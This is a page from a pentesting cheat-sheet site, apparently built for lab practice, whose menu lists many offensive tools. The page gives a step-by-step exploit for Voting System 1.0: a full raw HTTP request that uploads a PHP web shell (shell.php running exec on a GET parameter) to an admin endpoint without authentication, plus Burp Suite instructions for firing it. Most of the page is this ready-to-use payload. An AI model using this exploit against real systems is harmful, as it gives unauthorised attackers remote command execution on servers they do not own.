👨‍💻
Pentesting
  • Prerequisite
  • Penetration Testing Stages
  • Enumeration/Scanning
    • Nmap
    • Netdiscover
  • Web Attack
    • Ffuf
    • Dirb
    • GoBuster
    • Dirsearch
    • FeroxBuster
    • Wfuzz
    • Nikto
  • SSH
    • Download File
  • Transporting Files
    • Windows
    • Linux
  • Port Forwarding & Pivoting
  • Pwncat
  • SMB
    • SmbClient
    • SmbMap
  • SQL Injection
  • Reverse Shells
    • PHP Pentest Monkey
    • Bash
    • PHP
      • Voting System 1.0 - Remote Code Execution (Unauthenticated)
    • Netcat
    • Python
    • Nishang
  • Impacket
    • psexec.py
    • wmiexec.py
    • secretsdump.py
    • impacket-smbserver
    • GetUserSPNs.py
  • Active Directory Attacks
    • Enum4linux
    • Kerbrute
    • Responder.py
    • RPCclient
    • Crackmapexec
    • BloodHound-Python
    • Powerview.ps1
    • GetUserSPNs.py
    • SharpHound.ps1
    • Mimikatz
    • Metasploit
  • Password Cracking
    • Hydra
      • FTP
      • SSH
      • HTTP
    • Hashcat
    • John The Ripper
      • Jumbo John
  • Powershell
    • Secure String Powershell
  • MSFVenom
    • MSFVenom Payload
    • Multihandler Listener
    • AlwaysInstallElevated
  • Meterpreter
  • Privilege Escalation
    • Linux
      • GTFOBins
      • linPEAS
    • Windows
      • LOLBAS
      • winPEAS
      • AlwaysInstallElevated
      • System Enumeration
      • User Enum
      • Network Enumeration
  • WordPress
    • Wpscan
Powered by GitBook
On this page
  1. Reverse Shells
  2. PHP

Voting System 1.0 - Remote Code Execution (Unauthenticated)

PreviousPHPNextNetcat

Last updated 2 years ago

Payload

*Remember to add a blank line after the php code. Change host, origin, referer to target machine IP. Copy the below payload in Burpsuite /candidates.php and send to repeater.

POST /admin/candidates_add.php HTTP/1.1
Host: 10.10.10.239
Content-Length: 275
Cache-Control: max-age=0
Origin: http://10.10.10.239
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrmynB2CmGO6vwFpO
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.10.10.239/admin/candidates.php
Accept-Encoding: gzip, deflate
Accept-Language: de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

------WebKitFormBoundaryrmynB2CmGO6vwFpO
Content-Disposition: form-data; name="photo"; filename="shell.php"
Content-Type: application/octet-stream

<?php echo exec("whoami"); ?>
#<?php echo exec($_GET["cmd"]); ?>

------WebKitFormBoundaryrmynB2CmGO6vwFpO
Content-Disposition: form-data; name="add"

Check in for shell.php in http://10.10.10.239/images

Voting System 1.0 - Remote Code Execution (Unauthenticated)Exploit Database
Logo